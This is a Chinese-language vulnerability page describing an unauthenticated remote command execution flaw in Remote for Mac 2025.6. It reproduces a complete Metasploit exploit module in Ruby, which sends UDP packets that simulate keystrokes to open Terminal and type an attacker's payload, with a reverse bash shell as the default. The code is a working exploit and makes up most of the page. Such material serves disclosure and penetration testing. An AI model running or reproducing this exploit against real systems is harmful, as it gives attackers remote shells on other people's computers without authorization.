Remote for Mac 20256 Unauthenticated UDP Keyboard RCE

漏洞信息

漏洞名称: Remote for Mac 2025.6 Unauthenticated UDP Keyboard RCE

漏洞类型: 命令执行

漏洞等级: 高危

漏洞描述: 该漏洞影响的产品是Remote for Mac 2025.6,这是一款允许用户远程控制Mac设备的应用程序。它通常用于个人和企业环境中,以便于远程管理和操作Mac电脑。由于其广泛的应用,该漏洞的影响范围较大。

漏洞类型为命令执行,技术根源在于应用程序在启用“允许未知设备”设置时,未能正确验证UDP数据包的来源,导致攻击者可以通过发送特制的UDP数据包模拟键盘输入,无需认证即可执行任意命令。这种漏洞的利用方式直接且高效,攻击者可以通过网络远程触发。

该漏洞的安全风险极高,攻击者可以利用此漏洞在受害者的Mac上执行任意命令,可能导致数据泄露、服务中断或其他恶意活动。由于漏洞利用不需要认证,且可以自动化执行,因此攻击门槛较低,危害性大。攻击成功后,攻击者将获得与当前用户相同的权限,进一步增加了潜在的风险。

产品名称: Remote for Mac

影响版本: 2025.6

来源: https://github.com/rapid7/metasploit-framework/blob/3f6f4d20993489afed96fe110b52a625dfbec434/modules%2Fexploits%2Fosx%2Fmisc%2Fremote_for_mac_udp_rce.rb

类型: rapid7/metasploit-framework:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149

require 'json'
require 'socket'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Remote for Mac 2025.6 Unauthenticated UDP Keyboard RCE',
        'Description' => %q{
          This module exploits an unauthenticated remote code execution vulnerability in Remote for Mac 2025.6.
          When the "Allow unknown devices" setting is enabled, it is possible to simulate keyboard input via UDP packets
          without authentication. By sending a sequence of key presses, an attacker can open the Terminal and execute
          arbitrary shell commands, achieving code execution as the current user.

          Tested on macOS Mojave and Ventura.
        },
        'Author' => ['Chokri Hammedi'],
        'License' => MSF_LICENSE,
        'References' => [
          ['URL', 'https://packetstorm.news/files/id/196351/']
        ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, SCREEN_EFFECTS]
        },
        'Platform' => ['unix','osx'],
        'Arch' => ARCH_CMD,
        'Targets' => [['Remote for Mac 2025.6', {}]],
        'DefaultTarget' => 0,
        'DefaultPayload' => 'cmd/unix/reverse_bash',
        'DisclosureDate' => '2025-05-27'
      )
    )

    register_options(
      [
        Opt::RHOSTS(),
        Opt::RPORT(49229),
        OptBool.new('SSL', [true, 'Use SSL for HTTP check', true]),
        OptString.new('TARGETURI', [true, 'Base URI path', '/']),
      ]
    )
  end

  def check_auth_disabled?
    protocol = datastore['SSL'] ? 'https' : 'http'
    vprint_status("Checking authentication on #{protocol}://#{datastore['RHOSTS']}:#{datastore['RPORT']}#{datastore['TARGETURI']}api/getVersion")

    begin
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalize_uri(datastore['TARGETURI'], 'api', 'getVersion'),
        'ctype' => 'application/json',
        'ssl' => datastore['SSL'],
        'rport' => datastore['RPORT'],
        'rhost' => datastore['RHOSTS']
      })

      if res&.code == 200
        json = JSON.parse(res.body)
        if json['requires.auth'] == false
          print_good('Authentication is disabled. Target is vulnerable.')
          return true
        else
          print_error('Authentication is enabled. Exploit aborted.')
          return false
        end
      else
        print_error('Unexpected response from target')
        return false
      end
    rescue ::Rex::ConnectionError, JSON::ParserError => e
      print_error("Connection or parsing error: #{e.message}")
      return false
    end
  end

  def exploit
    unless check_auth_disabled?
      fail_with(Failure::NotVulnerable, 'Target requires authentication or is unreachable')
    end

    udp_port = datastore['RPORT']
    target_ip = datastore['RHOSTS']

    initial_packets_hex = [
      '07000200370001',
      '07000200370001',
      '060003002000',
      '07000200370000',
      '07000200370000'
    ]

    final_packets_hex = [
      '07000200240001',
      '07000200240000'
    ]

    udp_sock = UDPSocket.new
    udp_sock.connect(target_ip, udp_port)

    print_status('Simulating system keyboard input to open Terminal...')
    initial_packets_hex.each do |hexpkt|
      udp_sock.send([hexpkt].pack('H*'), 0)
      select(nil, nil, nil, 0.05)
    end

    prefix = [0x06, 0x00, 0x03, 0x00].pack('C*')
    'terminal'.each_char do |ch|
      pkt = prefix + ch.encode('utf-16le').force_encoding('ASCII-8BIT')
      udp_sock.send(pkt, 0)
      select(nil, nil, nil, 0.1)
    end

    final_packets_hex.each do |hexpkt|
      udp_sock.send([hexpkt].pack('H*'), 0)
      select(nil, nil, nil, 0.1)
    end

    sleep(2)

    shell_cmd = payload.encoded
    print_status('Sending malicious payload to be executed...')

    shell_cmd.each_char do |ch|
      pkt = prefix + ch.encode('utf-16le').force_encoding('ASCII-8BIT')
      udp_sock.send(pkt, 0)
      select(nil, nil, nil, 0.1)
    end

    final_packets_hex.each do |hexpkt|
      udp_sock.send([hexpkt].pack('H*'), 0)
      select(nil, nil, nil, 0.1)
    end

    print_good('Payload sent. Awaiting session...')
  ensure
    udp_sock.close if udp_sock
  end
end


Github Poc
#rapid7/metasploit-framework:github issues #命令执行
Remote for Mac 20256 Unauthenticated UDP Keyboard RCE
http://example.com/2025/07/28/github_3535993157/
作者
lianccc
发布于
2025年7月28日
许可协议